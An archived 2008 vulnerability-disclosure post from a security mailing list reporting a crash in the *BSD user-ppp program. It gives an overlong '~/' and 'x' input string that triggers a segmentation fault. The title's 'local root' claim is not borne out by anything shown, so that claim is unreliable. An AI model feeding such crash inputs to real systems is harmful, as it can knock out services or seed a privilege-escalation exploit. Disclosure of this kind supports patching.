Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

*BSD user-ppp local root (when conditions permit)

From: sipherr () gmail com
Date: 29 Feb 2008 16:39:03 -0000
/***********************************************************************************/

/***     pppx.conf - Point to Point Protocol (a.k.a. user-ppp) exploit by sipher ***/

/***     2003 / 12 /23   - PRIVATE CODE                                          ***/

/***     Program terminated with signal 11, Segmentation fault.                  ***/

/***     #0  0xbeefdead in ?? ()                                                 ***/

/***********************************************************************************/


I just tested this on FreeBSD 6.3. This bug was discovered on NetBSD. It also works on OpenBSD (unconfirmed on 4.2)


Steps to reproduce:


1. Run ppp

2. type the following (or atleat some variation of)

~/~/~/~/~/~/~/~/~/~/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx


This will produce a segmentation violation (Core dumped).


Discovered by: sipher


Shouts: princess^pookie,spithash,burnout,#codemasters,#hackers@dalnet
Previous By Date Next
Previous By Thread Next

Current thread: